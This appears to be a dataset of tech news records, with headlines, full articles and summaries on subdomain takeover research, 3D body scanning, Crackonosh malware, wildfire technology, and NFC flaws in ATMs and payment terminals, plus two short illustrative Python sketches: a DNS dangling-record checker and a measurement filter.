A security vulnerability could enable hackers to commandeer Website subdomains and inflict severe damage, according to researchers at Austria's Technical University of Wien (TU Wien) and Italy's Ca' Foscari University. The vulnerability lies in the persistence of dangling records - links to subdomains no longer in use - where TU Wien's Mauro Tempesta said attackers can establish their own domains. Such exploits can create vulnerabilities that pose risks to anyone who wants to use the actual site. The researchers found 1,520 vulnerable subdomains within 50,000 of the world's most critical Websites, and university sites were more likely to be vulnerable, since they have an especially large number of subdomains. TU Wien's Marco Squarcina said only 15% of those vulnerabilities have been corrected six months after administrators were warned of the threat. The internet is full of dangers: Sensitive data can be leaked, malicious websites can allow hackers to access private computers. The Security & Privacy Research Unit at TU Wien in collaboration with Ca' Foscari University has now uncovered a new important security vulnerability that has been overlooked so far. Large websites often have many subdomains - for example, "sub.example.com" could be a subdomain of the website "example.com." With certain tricks, it is possible to take control of such subdomains. And if that happens, new security holes open up that also put people at risk who simply want to use the actual website (in this example: example.com). The research team studied these vulnerabilities and also analysed how widespread the problem is: 50,000 of the world's most important websites were examined, and 1,520 vulnerable subdomains were discovered. The team was invited to the 30th USENIX Security Symposium, one of the most prestigious scientific conferences in the field of cybersecurity. The results have now been published online. "At first glance, the problem doesn't seem that bad," says Marco Squarcina from the Institute of Logic and Computation at TU Vienna. "After all, you might think that you can only gain access to a subdomain if you're explicitly allowed by the administrator of the website, but that's a mistake." This is because often a subdomain points to another website that is physically stored on completely different servers. Maybe you own the website example.com and want to add a blog. You don't want to build it from scratch, but instead use an existing blogging service of another website. Therefore, a subdomain, such as blog.example.com, is connected to another site. "If you use the example.com page and click on the blog there, you won't notice anything suspicious," says Marco Squarcina. "The address bar of the browser shows the correct subdomain blog.example.com, but the data now comes from a completely different server." But what happens if one day this link is no longer valid? Perhaps the blog is not needed anymore or it is relaunched elsewhere. Then the link from blog.example.com points to an external page that is no longer there. In this case, one speaks of "dangling records" - loose ends in the website's network that are ideal points of attack. "If such dangling records are not promptly removed, attackers can set up their own page there, which will then show up at sub.example.com," says Mauro Tempesta (also TU Wien). This is a problem because websites apply different security rules to different areas of the internet. 
Their own subdomains are typically considered "safe," even if they are in fact controlled from outside. For example, cookies placed on users by the main website can be overwritten and potentially accessed from any subdomains: in the worst case, an intruder can then impersonate another user and carry out illicit actions on their behalf. The team, composed of Marco Squarcina, Mauro Tempesta, Lorenzo Veronese, Matteo Maffei (TU Wien), and Stefano Calzavara (Ca' Foscari), investigated how common this problem is: "We examined 50,000 of the most visited sites in the world, discovering 26 million subdomains," says Marco Squarcina. "On 887 of these sites we found vulnerabilities, on a total of 1,520 vulnerable subdomains." Among the vulnerable sites were some of the most famous websites of all, such as cnn.com or harvard.edu. University sites are more likely to be affected because they usually have a particularly large number of subdomains. "We contacted all the people responsible for the vulnerable sites. Nevertheless, 6 months later, the problem was still only fixed on 15% of these subdomains," says Marco Squarcina. "In principle, it would not be difficult to fix these vulnerabilities. We hope that with our work we can create more awareness about this security threat." Further information and the original paper: canitakeyoursubdomain.name. Contact: Prof. Matteo Maffei, Institute for Logic and Computation, TU Wien, Favoritenstraße 9-11, 1040 Vienna, +43 1 58801 184860, matteo.maffei @ tuwien.ac.at; Dott. Marco Squarcina, Institute for Logic and Computation, TU Wien, Favoritenstraße 9-11, 1040 Vienna, +43 1 58801 192607, marco.squarcina @ tuwien.ac.at
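As a rough illustration of the kind of check the researchers describe, the hypothetical Python script below uses the dnspython library to flag subdomains whose CNAME records point at targets that no longer resolve, one common form of dangling record. It is not the team's measurement pipeline: the subdomain inventory, the library choice, and the decision to test only CNAME targets are simplifying assumptions, and a real audit would also examine A/AAAA records, NS delegations, and whether the abandoned target service lets the name be re-claimed.

# A minimal sketch, assuming dnspython is installed (pip install dnspython).
import dns.resolver

def cname_target(name):
    """Return the CNAME target of `name`, or None if it has no CNAME record."""
    try:
        answer = dns.resolver.resolve(name, "CNAME")
        return str(answer[0].target).rstrip(".")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
        return None

def target_resolves(name):
    """True if `name` still resolves to at least one IPv4 address."""
    try:
        dns.resolver.resolve(name, "A")
        return True
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
        return False

def find_dangling(subdomains):
    """Yield (subdomain, target) pairs whose CNAME target no longer resolves."""
    for sub in subdomains:
        target = cname_target(sub)
        if target and not target_resolves(target):
            yield sub, target

if __name__ == "__main__":
    # Hypothetical inventory of subdomains to audit.
    for sub, target in find_dangling(["blog.example.com", "shop.example.com"]):
        print(f"Possible dangling record: {sub} -> {target}")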
183
3D Scanning Breakthrough Means Results Are 4,500% More Accurate
Researchers from Loughborough University and the University of Manchester have written a free algorithm that can be used with any scanning machine. The new code, called Gryphon , is a simple data processing tool that identifies errors in the scan measurements and removes them. A new paper published in the journal Ergonomics shows how the team took 121 measurements from 97 participants using the Gryphon code and compared them to the current industry-standard data processing method. They found that the average margin of error for current 3D scanning machines is around 13.8cm when data is captured non-consecutively. However, once the Gryphon code had been used alongside capturing data consecutively, the figure fell to 0.3cm... a 4500% improvement in precision. Lead author Dr Chris Parker, of Loughborough School of Design and Creative Art, said: "When 3D body scanners measure people, the measurements can be so different from what you would take with a tape measure that the results cannot be easily used." "In fact, 0% of current measurements meet the precision you might expect from an expert, and are too imprecise to design clothes. We change that. "At the minute, practitioners who use 3D scanners need a lot of training to spot errors, remove them from the data set, and rescan the person - so mistakes are common. Because of this, 3D body scanning is slow and, in many ways, unreliable. "If the 3D body scanning industry adopts Gryphon into their software, then they will make their measurements 4500% more precise than they currently are - and it can all be done through a simple software update. "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D Body Scanning create custom garments for everyone - without the fuss." Scanners are used in various industries such as performance sportswear design, fashion design and 3D morphometric evaluation. They are also used for ergonomic and anthropometric investigation of the human form. ENDS
Scientists at the U.K.'s Loughborough University and University of Manchester have boosted the accuracy of three-dimensional (3D) body scans by 4,500% via a free algorithm that can be used with any scanning system. The Gryphon code can identify and remove errors in scan measurements. In 121 measurements of 97 participants, Gryphon had a margin of error of 0.3 centimeters, compared to an average of 13.8 centimeters for current 3D scanning machines when data is captured non-consecutively. Loughborough's Chris Parker said, "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D body scanning create custom garments for everyone - without the fuss."
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the U.K.'s Loughborough University and University of Manchester have boosted the accuracy of three-dimensional (3D) body scans by 4,500% via a free algorithm that can be used with any scanning system. The Gryphon code can identify and remove errors in scan measurements. In 121 measurements of 97 participants, Gryphon had a margin of error of 0.3 centimeters, compared to an average of 13.8 centimeters for current 3D scanning machines when data is captured non-consecutively. Loughborough's Chris Parker said, "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D body scanning create custom garments for everyone - without the fuss." Researchers from Loughborough University and the University of Manchester have written a free algorithm that can be used with any scanning machine. The new code, called Gryphon , is a simple data processing tool that identifies errors in the scan measurements and removes them. A new paper published in the journal Ergonomics shows how the team took 121 measurements from 97 participants using the Gryphon code and compared them to the current industry-standard data processing method. They found that the average margin of error for current 3D scanning machines is around 13.8cm when data is captured non-consecutively. However, once the Gryphon code had been used alongside capturing data consecutively, the figure fell to 0.3cm... a 4500% improvement in precision. Lead author Dr Chris Parker, of Loughborough School of Design and Creative Art, said: "When 3D body scanners measure people, the measurements can be so different from what you would take with a tape measure that the results cannot be easily used." "In fact, 0% of current measurements meet the precision you might expect from an expert, and are too imprecise to design clothes. We change that. "At the minute, practitioners who use 3D scanners need a lot of training to spot errors, remove them from the data set, and rescan the person - so mistakes are common. Because of this, 3D body scanning is slow and, in many ways, unreliable. "If the 3D body scanning industry adopts Gryphon into their software, then they will make their measurements 4500% more precise than they currently are - and it can all be done through a simple software update. "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D Body Scanning create custom garments for everyone - without the fuss." Scanners are used in various industries such as performance sportswear design, fashion design and 3D morphometric evaluation. They are also used for ergonomic and anthropometric investigation of the human form. ENDS
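The core idea reported in the paper, identifying erroneous scanner measurements and removing them before the remaining consecutive captures are combined, can be sketched in a few lines. The snippet below is not the published Gryphon code; it is a hedged illustration of one plausible approach, and the deviation threshold and the use of a median reference are assumptions rather than details taken from the paper.

import statistics

def clean_measurement(captures, max_dev_cm=1.0):
    """Filter repeated consecutive captures of one body measurement.

    captures   : list of floats (in cm) from consecutive scans of the same person
    max_dev_cm : captures further than this from the median are treated as
                 scanner errors and discarded (an assumed threshold, not a
                 value from the paper)
    Returns the mean of the retained captures, or None if every capture was rejected.
    """
    median = statistics.median(captures)
    kept = [c for c in captures if abs(c - median) <= max_dev_cm]
    return statistics.fmean(kept) if kept else None

# Example: five consecutive waist measurements, one of them clearly wrong.
print(clean_measurement([81.2, 81.0, 94.6, 81.3, 81.1]))  # prints 81.15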
184
Verizon Shows Off 5G-Connected Robots at Barcelona Conference
Wireless network operator Verizon this week showcased two robots that reportedly communicate with each other via 5G connectivity and mobile edge computing at the Mobile World conference in Barcelona, Spain. Edge computing analyzes bulk data where it was collected using augmented reality and machine learning, and demands rapid data transfers that only high-speed 5G signals can deliver. Verizon's Rima Qureshi said, "5G will make it possible for robots to connect with other robots and devices of all kinds in a way that simply wasn't possible before." Qureshi said drones using 5G-enabled communications would be able to stream video to multiple recipients simultaneously, so they could each focus on different aspects of an image.
[]
[]
[]
scitechnews
None
None
None
None
Wireless network operator Verizon this week showcased two robots that reportedly communicate with each other via 5G connectivity and mobile edge computing at the Mobile World conference in Barcelona, Spain. Edge computing analyzes bulk data where it was collected using augmented reality and machine learning, and demands rapid data transfers that only high-speed 5G signals can deliver. Verizon's Rima Qureshi said, "5G will make it possible for robots to connect with other robots and devices of all kinds in a way that simply wasn't possible before." Qureshi said drones using 5G-enabled communications would be able to stream video to multiple recipients simultaneously, so they could each focus on different aspects of an image.
185
Crashes Involving Tesla Autopilot, Other Driver-Assistance Systems Attract Scrutiny
The U.S. National Highway Traffic Safety Administration (NHTSA) is requiring automakers to start disclosing and tracking crashes involving vehicles that use advanced driver-assistance systems (ADAS). The agency has initiated probes into about three dozen collisions of vehicles using such systems, all but six involving Teslas. The NHTSA said automakers must furnish reports of serious collisions within a day of learning about them; provide more complete data on serious crashes involving ADAS systems within 10 days; and report on all crashes involving such systems every month. The NHTSA's Steven Cliff said these mandates will give the agency access to data that can help rapidly identify safety problems in ADAS systems.
[]
[]
[]
scitechnews
None
None
None
None
The U.S. National Highway Traffic Safety Administration (NHTSA) is requiring automakers to start disclosing and tracking crashes involving vehicles that use advanced driver-assistance systems (ADAS). The agency has initiated probes into about three dozen collisions of vehicles using such systems, all but six involving Teslas. The NHTSA said automakers must furnish reports of serious collisions within a day of learning about them; provide more complete data on serious crashes involving ADAS systems within 10 days; and report on all crashes involving such systems every month. The NHTSA's Steven Cliff said these mandates will give the agency access to data that can help rapidly identify safety problems in ADAS systems.
187
Hackers Infecting Gamers' PCs with Malware to Make Millions From Crypto
This is not the first time that malware has impacted games. Researchers at Cisco-Talos discovered malware inside cheat software for multiple games in March. Meanwhile, a new hacking campaign targeted gamers via the Steam platform earlier this month. The number of cyberattacks on gamers has surged 340% during the coronavirus pandemic, according to a report from Akamai Security Research this week. "Criminals are relentless, and we have the data to show it," said Steve Ragan, Akamai security researcher and author of the State of the Internet/Security report. "We're observing a remarkable persistence in video game industry defenses being tested on a daily - and often hourly - basis by criminals probing for vulnerabilities through which to breach servers and expose information. We're also seeing numerous group chats forming on popular social networks that are dedicated to sharing attack techniques and best practices."
Security firm Avast has found that hackers are exploiting gamers with "Crackonosh" malware to generate millions by mining cryptocurrency using gamers' computers. Avast researchers said the criminals hide Crackonosh in free downloadable versions of games like NBA 2K19, Grand Theft Auto V, and Far Cry 5, available on torrent sites; upon installation, Crackonosh starts the gamers' PCs crypto-mining. The researchers estimate Crackonosh has been used to mine $2 million in Monero cryptocurrency since June 2018; Avast's Daniel Benes said about 220,000 users have been infected worldwide, with an additional 800 devices infected daily. Benes said indications of the malware's presence can include slower PC performance and higher-than-normal electricity bills.
[]
[]
[]
scitechnews
None
None
None
None
Security firm Avast has found that hackers are exploiting gamers with "Crackonosh" malware to generate millions by mining cryptocurrency using gamers' computers. Avast researchers said the criminals hide Crackonosh in free downloadable versions of games like NBA 2K19, Grand Theft Auto V, and Far Cry 5, available on torrent sites; upon installation, Crackonosh starts the gamers' PCs crypto-mining. The researchers estimate Crackonosh has been used to mine $2 million in Monero cryptocurrency since June 2018; Avast's Daniel Benes said about 220,000 users have been infected worldwide, with an additional 800 devices infected daily. Benes said indications of the malware's presence can include slower PC performance and higher-than-normal electricity bills. This is not the first time that malware has impacted games. Researchers at Cisco-Talos discovered malware inside cheat software for multiple games in March. Meanwhile, a new hacking campaign targeted gamers via the Steam platform earlier this month. The number of cyberattacks on gamers has surged 340% during the coronavirus pandemic, according to a report from Akamai Security Research this week. "Criminals are relentless, and we have the data to show it," said Steve Ragan, Akamai security researcher and author of the State of the Internet/Security report. "We're observing a remarkable persistence in video game industry defenses being tested on a daily - and often hourly - basis by criminals probing for vulnerabilities through which to breach servers and expose information. We're also seeing numerous group chats forming on popular social networks that are dedicated to sharing attack techniques and best practices."
188
California Wildfires: Fighting Bigger Blazes with Silicon Valley Technology
Startup Lumineye began with a goal of giving soldiers power to see through walls. But climate change has broadened the market, and Lumineye is now working with firefighters to tweak its product - a hand-held device that uses radar to see people inside buildings and in thick brush. "Unfortunately, the more often fires are occurring, the more we'll be focused on that use case," said Megan Lacy, co-founder and co-CEO of the company birthed from a class that grew out of a Stanford University entrepreneurship initiative. California's drought, plus forests full of fuels and communities along narrow roads in heavily treed areas make for a lethal recipe, tragically exemplified by the 2018 Camp Fire that killed 86 people in Paradise. With scientists agreeing that climate change will make wildfires increasingly catastrophic, the specter of flames devouring communities and smothering the state in smoke is driving innovation, much of it in Silicon Valley, to fight fires with new technology. Last year, a wall of fire swept down from the Santa Cruz Mountains toward tech-industry guru Steve Blank's palatial home overlooking the ocean south of Pescadero. His house remains standing thanks to what he calls the heroism of Cal Fire's ground forces, who helped him fight the flames to within a foot of his home. But if California does not aggressively implement new technologies, Blank believes, much of the Bay Area and the rest of California will be left in smoky ruins. "You're looking for force multipliers," said Blank, who invests in Rain , a Palo Alto startup making retardant-dropping drones. "How do we fight this exponential growth (in wildfires) without exceeding the gross domestic product of California?" Blank imagines a future where satellites detect fires as soon as they start and artificial intelligence software dispatches firefighting drones. That Blank would propose a Silicon Valley solution featuring AI and flying robots is perhaps unsurprising. He's an influential startup expert who teaches at UC Berkeley and Stanford University - his "Hacking for Defense" class at Stanford grew into a national program that produced Lumineye. And Blank's vision appears to be getting closer to reality every day. Cal Fire and other agencies have begun using AI, satellites and drones, and are examining other cutting-edge solutions. San Bernardino County Fire Chief Dan Munsey noted that not long ago, fire chiefs relied mostly on paper maps and ink markers. "The technology adoption we've seen over the last three years has exploded," Munsey said. During the Santa Cruz Mountains fire last year, one in a series of huge blazes sparked by dry lightning, Bay Area startup Zonehaven's map-based evacuation software for official and citizen use went live in what CEO Charlie Crocker described as "our trial by fire." Zonehaven was founded in 2018, and already, Cal Fire and dozens of other agencies and local governments - including Santa Clara, San Mateo, Contra Costa and Alameda counties - are adopting it to coordinate the safe exodus of people from threatened areas. The public app shows residents where they are on a map, with evacuation status - from advisory to warning to order - shown by the coloring of their zone. "If you were to really boil down what is the real issue in what I call the era of the mega-fires, it's evacuations," said Cal Fire's Santa Clara County unit Chief Jake Hess. Last year's fires torched a record 4.3 million acres in California, and this year, 85% of California is in extreme drought. 
Seven major wildfires were already burning last week across the state. At Rain, which is trying to sell service contracts for its drones to Cal Fire and other agencies, CEO Maxwell Brodie believes that while traditional firefighting methods are crucial they are insufficient in the face of more and bigger fires. "It doesn't matter how many people or aircraft or tankers you throw at the problem, our solutions do not scale," he said. "A significant challenge integrating new technology into fire operations is overcoming the ways things have always been." In the Menlo Park Fire District, Chief Harold Schapelhouman oversees a fleet of 30 camera-bearing drones he says could provide valuable eyes in the sky during wildfires, including at night and in smoke and weather conditions that ground choppers and planes. Cal Fire's use of drones for landscape and damage surveys is a good step, he believes, but the agency's safety rules don't allow him to launch his drones during wildfires, even flying low enough to not threaten firefighting aircraft. "Take the handcuffs off," he said. "Let us fly." Capella Space, a San Francisco company that has four satellites in orbit that can provide detailed landscape photos day or night, through clouds or smoke, plans to pitch its services to Cal Fire and the U.S. Forest Service so the agencies could "provide rapid information to the people on the ground to ensure that when they go into an area they know what to expect," said Dan Getman, vice-president of product. Stanford University materials science professor Eric Appel, who led development of a fire-stopping gel for roadsides, said caution about new firefighting technology is warranted "because people have also been trying to sell snake oil in this field for a long time." While Cal Fire's emergency funding in 2020-21 skyrocketed from an initial $360 million to more than $1 billion by the end of 2020 - paying for more firefighters and aircraft - money for new technologies is comparatively scarce, said Appel. Phillip SeLegue, deputy chief of Cal Fire's Intel unit, said the agency is responding to technological change along with environmental change and pointed to its adoption of data-processing platform Technosylva, which forecasts, monitors, and predicts fires and their spread. His colleague Hess described the software as "a technological shot in the arm." Cal Fire has also received real-time imagery from U.S. military drones, and invested heavily in a widespread system of forest cameras, Hess noted. The agency gets other feeds from classified Pentagon sources and from satellites that detect ignitions and allow ongoing fire assessment in nearly real-time, all visible on the Technosylva platform along with the ALERT camera views, SeLegue said. Artificial intelligence software that processes imagery from Cal Fire aircraft and sends it to ground commanders to show fire locations should be in full use this year, SeLegue added. The agency plans to align with the U.S. Forest Service in using drones to ignite controlled burns to block fire spread, and is working with NASA on integrating autonomous drones into firefighting, potentially to carry people and supplies, provide communication links, or even drop retardant, he said. 
Whether technology can save us amid California's warming climate remains to be seen. Many communities in the Oakland and Berkeley hills, or in Woodside, Los Gatos, Felton and Bonny Doon, are nestled in forests and have limited escape routes. "It's really just a dice game," Stanford's Appel said. "The more big catastrophic fires we have, the greater chance that we have another Paradise."
A host of Silicon Valley-based technology developers is working with firefighters to enhance their firefighting capabilities. Technology industry investor Steve Blank envisions satellites detecting blazes as soon as they break out, with firefighting drones dispatched by artificial intelligence (AI). The California Department of Forestry and Fire Protection (Cal Fire) and other agencies have started using AI, satellites, and drones, and are considering additional measures. Phillip SeLegue at Cal Fire's Intelligence unit cited the adoption of the Technosylva data-processing platform, which predicts and monitors fires and their spread via a combination of real-time satellite and camera imagery. SeLegue also said this year should see the full deployment of aircraft imagery-processing AI software that transmits fire-location data to ground commanders.
[]
[]
[]
scitechnews
None
None
None
None
A host of Silicon Valley-based technology developers is working with firefighters to enhance their firefighting capabilities. Technology industry investor Steve Blank envisions satellites detecting blazes as soon as they break out, with firefighting drones dispatched by artificial intelligence (AI). The California Department of Forestry and Fire Protection (Cal Fire) and other agencies have started using AI, satellites, and drones, and are considering additional measures. Phillip SeLegue at Cal Fire's Intelligence unit cited the adoption of the Technosylva data-processing platform, which predicts and monitors fires and their spread via a combination of real-time satellite and camera imagery. SeLegue also said this year should see the full deployment of aircraft imagery-processing AI software that transmits fire-location data to ground commanders. Startup Lumineye began with a goal of giving soldiers power to see through walls. But climate change has broadened the market, and Lumineye is now working with firefighters to tweak its product - a hand-held device that uses radar to see people inside buildings and in thick brush. "Unfortunately, the more often fires are occurring, the more we'll be focused on that use case," said Megan Lacy, co-founder and co-CEO of the company birthed from a class that grew out of a Stanford University entrepreneurship initiative. California's drought, plus forests full of fuels and communities along narrow roads in heavily treed areas make for a lethal recipe, tragically exemplified by the 2018 Camp Fire that killed 86 people in Paradise. With scientists agreeing that climate change will make wildfires increasingly catastrophic, the specter of flames devouring communities and smothering the state in smoke is driving innovation, much of it in Silicon Valley, to fight fires with new technology. Last year, a wall of fire swept down from the Santa Cruz Mountains toward tech-industry guru Steve Blank's palatial home overlooking the ocean south of Pescadero. His house remains standing thanks to what he calls the heroism of Cal Fire's ground forces, who helped him fight the flames to within a foot of his home. But if California does not aggressively implement new technologies, Blank believes, much of the Bay Area and the rest of California will be left in smoky ruins. "You're looking for force multipliers," said Blank, who invests in Rain , a Palo Alto startup making retardant-dropping drones. "How do we fight this exponential growth (in wildfires) without exceeding the gross domestic product of California?" Blank imagines a future where satellites detect fires as soon as they start and artificial intelligence software dispatches firefighting drones. That Blank would propose a Silicon Valley solution featuring AI and flying robots is perhaps unsurprising. He's an influential startup expert who teaches at UC Berkeley and Stanford University - his "Hacking for Defense" class at Stanford grew into a national program that produced Lumineye. And Blank's vision appears to be getting closer to reality every day. Cal Fire and other agencies have begun using AI, satellites and drones, and are examining other cutting-edge solutions. San Bernardino County Fire Chief Dan Munsey noted that not long ago, fire chiefs relied mostly on paper maps and ink markers. "The technology adoption we've seen over the last three years has exploded," Munsey said. 
During the Santa Cruz Mountains fire last year, one in a series of huge blazes sparked by dry lightning, Bay Area startup Zonehaven's map-based evacuation software for official and citizen use went live in what CEO Charlie Crocker described as "our trial by fire." Zonehaven was founded in 2018, and already, Cal Fire and dozens of other agencies and local governments - including Santa Clara, San Mateo, Contra Costa and Alameda counties - are adopting it to coordinate the safe exodus of people from threatened areas. The public app shows residents where they are on a map, with evacuation status - from advisory to warning to order - shown by the coloring of their zone. "If you were to really boil down what is the real issue in what I call the era of the mega-fires, it's evacuations," said Cal Fire's Santa Clara County unit Chief Jake Hess. Last year's fires torched a record 4.3 million acres in California, and this year, 85% of California is in extreme drought. Seven major wildfires were already burning last week across the state. At Rain, which is trying to sell service contracts for its drones to Cal Fire and other agencies, CEO Maxwell Brodie believes that while traditional firefighting methods are crucial they are insufficient in the face of more and bigger fires. "It doesn't matter how many people or aircraft or tankers you throw at the problem, our solutions do not scale," he said. "A significant challenge integrating new technology into fire operations is overcoming the ways things have always been." In the Menlo Park Fire District, Chief Harold Schapelhouman oversees a fleet of 30 camera-bearing drones he says could provide valuable eyes in the sky during wildfires, including at night and in smoke and weather conditions that ground choppers and planes. Cal Fire's use of drones for landscape and damage surveys is a good step, he believes, but the agency's safety rules don't allow him to launch his drones during wildfires, even flying low enough to not threaten firefighting aircraft. "Take the handcuffs off," he said. "Let us fly." Capella Space , a San Francisco company that has four satellites in orbit that can provide detailed landscape photos day or night, through clouds or smoke, plans to pitch its services to Cal Fire and the U.S. Forest Service so the agencies could "provide rapid information to the people on the ground to ensure that when they go into an area they know what to expect," said Dan Getman, vice-president of product. Stanford University materials science professor Eric Appel, who led development of a fire-stopping gel for roadsides, said caution about new firefighting technology is warranted "because people have also been trying to sell snake oil in this field for a long time." While Cal Fire's emergency funding in 2020-21 skyrocketed from an initial $360 million to more than $1 billion by the end of 2020 - paying for more firefighters and aircraft - money for new technologies is comparatively scarce, said Appel. Phillip SeLegue, deputy chief of Cal Fire's Intel unit, said the agency is responding to technological change along with environmental change and pointed to its adoption of data-processing platform Technosylva, which forecasts, monitors, and predicts fires and their spread. His colleague Hess described the software as "a technological shot in the arm." Cal Fire has also received real-time imagery from U.S. military drones, and invested heavily in a widespread system of forest cameras, Hess noted. 
The agency gets other feeds from classified Pentagon sources and from satellites that detect ignitions and allow ongoing fire assessment in nearly real-time, all visible on the Technosylva platform along with the ALERT camera views, SeLegue said. Artificial intelligence software that processes imagery from Cal Fire aircraft and sends it to ground commanders to show fire locations should be in full use this year, SeLegue added. The agency plans to align with the U.S. Forest Service in using drones to ignite controlled burns to block fire spread, and is working with NASA on integrating autonomous drones into firefighting, potentially to carry people and supplies, provide communication links, or even drop retardant, he said. Whether technology can save us amid California's warming climate remains to be seen. Many communities in the Oakland and Berkeley hills, or in Woodside, Los Gatos, Felton and Bonny Doon, are nestled in forests and have limited escape routes. "It's really just a dice game," Stanford's Appel said. "The more big catastrophic fires we have, the greater chance that we have another Paradise."
190
Microsoft Discloses New Customer Hack Linked to SolarWinds Cyberattackers
Microsoft has issued a warning that hackers affiliated with Russia's Foreign Intelligence Service had installed data-harvesting malware on one of its systems and used the information to attack some of its customers. The company identified the attackers as Nobelium, the same group linked to the breach at Texas-based software supplier SolarWinds. A Microsoft spokesman said in compromising a computer used by a Microsoft customer support employee, the attackers could have accessed metadata of the company's accounts and billing contact information. The software giant said it knows of three customers affected by the breach, and has eliminated the access point and secured the device.
[]
[]
[]
scitechnews
None
None
None
None
Microsoft has issued a warning that hackers affiliated with Russia's Foreign Intelligence Service had installed data-harvesting malware on one of its systems and used the information to attack some of its customers. The company identified the attackers as Nobelium, the same group linked to the breach at Texas-based software supplier SolarWinds. A Microsoft spokesman said in compromising a computer used by a Microsoft customer support employee, the attackers could have accessed metadata of the company's accounts and billing contact information. The software giant said it knows of three customers affected by the breach, and has eliminated the access point and secured the device.
191
Banning Extreme Views on YouTube Really Does Help Stop Their Spread
The results of a study indicated that banning people who espouse extreme views from the YouTube online video platform shrinks their audience. National Taiwan University's Adrian Rauchfleisch and Harvard University's Jonas Kaiser reviewed more than 11,000 YouTube channels of all political varieties between January 2018 and October 2019, tracking the number of videos each account posted, how many views they received, and whether they stayed on YouTube during the study period. Approximately one in 20 channels was deleted or banned, while 25% were removed for copyright infringement, with far-right-leaning channels more likely to be barred for breaching hate speech regulations. The average YouTube-posted video got 19.5 times more views than the average on extremist video-hosting platform BitChute, although this differed by channel. Said Rebekah Tromble at George Washington University, "We still have a lot to learn about the larger video-sharing ecosystem."
[]
[]
[]
scitechnews
None
None
None
None
The results of a study indicated that banning people who espouse extreme views from the YouTube online video platform shrinks their audience. National Taiwan University's Adrian Rauchfleisch and Harvard University's Jonas Kaiser reviewed more than 11,000 YouTube channels of all political varieties between January 2018 and October 2019, tracking the number of videos each account posted, how many views they received, and whether they stayed on YouTube during the study period. Approximately one in 20 channels was deleted or banned, while 25% were removed for copyright infringement, with far-right-leaning channels more likely to be barred for breaching hate speech regulations. The average YouTube-posted video got 19.5 times more views than the average on extremist video-hosting platform BitChute, although this differed by channel. Said Rebekah Tromble at George Washington University, "We still have a lot to learn about the larger video-sharing ecosystem."
192
NFC Flaws Let Researchers Hack ATMs by Waving a Phone
For years, security researchers and cybercriminals have hacked ATMs by using all possible avenues to their innards, from opening a front panel and sticking a thumb drive into a USB port to drilling a hole that exposes internal wiring . Now one researcher has found a collection of bugs that allow him to hack ATMs - along with a wide variety of point-of-sale terminals - in a new way: with a wave of his phone over a contactless credit card reader. Josep Rodriguez, a researcher and consultant at security firm IOActive, has spent the last year digging up and reporting vulnerabilities in the so-called near-field communications reader chips used in millions of ATMs and point-of-sale systems worldwide. NFC systems are what let you wave a credit card over a reader - rather than swipe or insert it - to make a payment or extract money from a cash machine. You can find them on countless retail store and restaurant counters, vending machines, taxis, and parking meters around the globe. Now Rodriguez has built an Android app that allows his smartphone to mimic those credit card radio communications and exploit flaws in the NFC systems' firmware. With a wave of his phone, he can exploit a variety of bugs to crash point-of-sale devices, hack them to collect and transmit credit card data, invisibly change the value of transactions, and even lock the devices while displaying a ransomware message. Rodriguez says he can even force at least one brand of ATMs to dispense cash - though that "jackpotting" hack only works in combination with additional bugs he says he's found in the ATMs' software. He declined to specify or disclose those flaws publicly due to nondisclosure agreements with the ATM vendors. "You can modify the firmware and change the price to one dollar, for instance, even when the screen shows that you're paying 50 dollars. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here," says Rodriguez of the point-of-sale attacks he discovered. "If you chain the attack and also send a special payload to an ATM's computer, you can jackpot the ATM - like cash out, just by tapping your phone." Rodriguez says he alerted the affected vendors - which include ID Tech, Ingenico, Verifone, Crane Payment Innovations, BBPOS, Nexgo, and the unnamed ATM vendor - to his findings between 7 months and a year ago. Even so, he warns that the sheer number of affected systems and the fact that many point-of-sale terminals and ATMs don't regularly receive software updates - and in many cases require physical access to update - mean that many of those devices likely remain vulnerable. "Patching so many hundreds of thousands of ATMs physically, it's something that would require a lot of time," Rodriguez says. As a demonstration of those lingering vulnerabilities, Rodriguez shared a video with WIRED in which he waves a smartphone over the NFC reader of an ATM on the street in Madrid, where he lives, and causes the machine to display an error message. The NFC reader appears to crash, and no longer reads his credit card when he next touches it to the machine. (Rodriguez asked that WIRED not publish the video for fear of legal liability. He also didn't provide a video demo of a jackpotting attack because, he says, he could only legally test it on machines obtained as part of IOActive's security consulting to the affected ATM vendor, with whom IOActive has signed an NDA.) 
The findings are "excellent research into the vulnerability of software running on embedded devices," says Karsten Nohl, the founder of security firm SRLabs and a well-known firmware hacker, who reviewed Rodriguez's work. But Nohl points to a few drawbacks that reduce its practicality for real-world thieves. A hacked NFC reader would only be able to steal mag-stripe credit card data, not the victim's PIN or the data from EMV chips . And the fact that the ATM cashout trick would require an extra, distinct vulnerability in a target ATM's code is no small caveat, Nohl says.
An Android app developed by IOActive's Josep Rodriguez exploits flaws in near-field communication (NFC) systems, enabling ATMs and a variety of point-of-sale terminals to be hacked by waving a smartphone over a contactless credit card reader. Rodriguez said his app was able to force at least one ATM brand to dispense cash, but only in combination with other flaws in the ATM's software. Rodriguez added that the point-of-sale vulnerabilities allow you to "modify the firmware and change the price to $1, for instance, even when the screen shows that you're paying $50. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here." The findings have been disclosed to the affected vendors, but Rodriguez acknowledged that physically patching hundreds of thousands of affected terminals and ATMs "would require a lot of time."
[]
[]
[]
scitechnews
None
None
None
None
